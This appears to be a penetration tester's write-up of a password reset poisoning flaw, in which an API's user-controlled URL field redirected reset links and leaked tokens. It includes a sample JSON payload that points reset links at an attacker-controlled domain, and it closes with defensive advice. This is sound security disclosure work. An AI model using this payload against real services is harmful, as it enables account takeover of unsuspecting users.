Password Reset Poisoning Leading to Account Takeover

Overview

During a penetration test of a Web Applications API, I discovered a vulnerability in the password reset functionality that allowed an attacker to intercept reset tokens and take over user accounts. By manipulating a user-controllable field in the password reset POST request, the reset link sent to victims pointed to an attacker-controlled domain.

Objective

Authenticated testing of the application's API endpoints, focusing on privilege escalation and authentication vulnerabilities.

Discovery

While analysing the password reset endpoint, I observed that the API accepted a JSON payload containing an email and a URL field. The URL parameter was user-controlled and not properly validated or restricted.

An example of the JSON request body sent to the API looked like this:

{
  "email": "victim@example.com",
  "url": "https://attacker-controlled-domain.com/reset"
}

To test this, I supplied a domain I controlled as the URL value in the password reset request (for a quick PoC I used a Python HTTP server, but the same can be achieved multiple ways; Burp Collaborator for example). When the reset email was sent to the user, the link contained my supplied URL. Upon clicking the link, the reset token was exposed to my domain, allowing me to intercept it, reset the user's password, and gain full access to their account.

Takeaway

This finding highlights the critical risk of allowing user-controlled URLs in password reset flows without validation. Attackers can poison reset emails to capture tokens and hijack accounts. Ensuring URLs are properly validated or restricted to trusted domains is essential to maintaining secure authentication processes.